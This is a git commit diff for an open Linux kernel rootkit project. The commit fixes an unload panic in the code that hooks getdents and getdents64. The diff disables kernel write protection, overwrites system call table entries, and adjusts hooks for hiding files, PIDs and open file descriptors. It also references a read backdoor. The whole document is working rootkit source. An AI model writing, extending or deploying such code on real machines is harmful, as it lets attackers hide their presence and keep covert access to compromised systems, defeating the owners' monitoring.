commit b473b83b5c4cf55cf529b0dba4c70da4f28318f3
parent e061720c0026bdfa1da05947348dc579dcde4db5
Author: deurzen <m.deurzen@tum.de>
Date: Sun, 6 Dec 2020 14:13:19 +0100
fixes unload panic
Diffstat:
4 files changed, 19 insertions(+), 7 deletions(-)
diff --git a/src/filehide.c b/src/filehide.c
@@ -14,7 +14,9 @@
void
hide_files(void)
{
- if (atomic_inc_return(&getdents_install_count) == 1) {
+ if (atomic_inc_return(&getdents_install_count) >= 1) {
+ atomic_set(&getdents_install_count, 1);
+
disable_protection();
sys_calls[__NR_getdents] = (void *)g7_getdents;
sys_calls[__NR_getdents64] = (void *)g7_getdents64;
diff --git a/src/hook.c b/src/hook.c
@@ -72,10 +72,8 @@ init_hooks(void)
if (rootkit.hiding_open)
hide_open();
- if (rootkit.hiding_pids) {
- clear_hidden_pids();
- unhide_pids();
- }
+ if (rootkit.hiding_pids)
+ hide_pids();
if (rootkit.backdoor == BD_READ)
backdoor_read();
@@ -92,6 +90,14 @@ remove_hooks(void)
if (rootkit.hiding_files)
unhide_files();
+ if (rootkit.hiding_open)
+ unhide_open();
+
+ if (rootkit.hiding_pids) {
+ clear_hidden_pids();
+ unhide_pids();
+ }
+
if (rootkit.backdoor != BD_OFF)
unbackdoor();
}
diff --git a/src/openhide.c b/src/openhide.c
@@ -26,7 +26,9 @@ fd_list_t_ptr hidden_fds_tail = &hidden_fds;
void
hide_open(void)
{
- if (atomic_inc_return(&getdents_install_count) == 1) {
+ if (atomic_inc_return(&getdents_install_count) >= 1) {
+ atomic_set(&getdents_install_count, 1);
+
disable_protection();
sys_calls[__NR_getdents] = (void *)g7_getdents;
sys_calls[__NR_getdents64] = (void *)g7_getdents64;
diff --git a/src/pidhide.c b/src/pidhide.c
@@ -15,7 +15,9 @@ pid_list_t_ptr hidden_pids_tail = &hidden_pids;
void
hide_pids(void)
{
- if (atomic_inc_return(&getdents_install_count) == 1) {
+ if (atomic_inc_return(&getdents_install_count) >= 1) {
+ atomic_set(&getdents_install_count, 1);
+
disable_protection();
sys_calls[__NR_getdents] = (void *)g7_getdents;
sys_calls[__NR_getdents64] = (void *)g7_getdents64;
